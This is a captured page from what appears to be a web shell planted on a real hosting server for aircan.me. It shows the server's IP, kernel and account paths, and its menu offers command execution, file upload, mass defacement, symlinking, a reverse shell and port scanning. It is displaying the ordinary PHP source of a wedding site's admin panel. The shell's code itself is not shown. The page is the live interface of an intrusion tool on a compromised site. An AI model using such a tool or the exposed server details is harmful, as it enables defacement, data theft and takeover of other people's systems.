Tul xxx Tul
User / IP
:
216.73.216.227
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
eileen
/
admin
/
Viewing: index.php
<?php require_once 'auth.php'; require_once 'includes/db.php'; $currentPage = $_GET['page'] ?? 'dashboard'; $user = $_SESSION['admin_user']; $validPages = ['dashboard','users','hero','countdown','timeline','gallery','panels','guestbook','rsvp','location','cta','settings']; if (!in_array($currentPage, $validPages)) { $currentPage = 'dashboard'; } $db = getDB(); $favicon = $db->query("SELECT setting_value FROM site_settings WHERE setting_key = 'favicon'")->fetchColumn(); $faviconUrl = $favicon ? '../' . $favicon : '../public/assets/images/favicon.png'; ?> <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Admin ยท Panel Administrativo</title> <link rel="icon" href="<?= htmlspecialchars($faviconUrl) ?>" type="image/png"> <link rel="stylesheet" href="assets/css/admin.css"> <script src="https://unpkg.com/@phosphor-icons/web"></script> </head> <body> <?php include 'includes/sidebar.php'; ?> <?php include 'includes/header.php'; ?> <div class="sidebar-overlay" onclick="toggleSidebar()"></div> <div class="main-content"> <?php include "pages/{$currentPage}.php"; ?> </div> <div class="toast-container"></div> <script src="assets/js/admin.js"></script> </body> </html>
Coded With 💗 by
0x6ick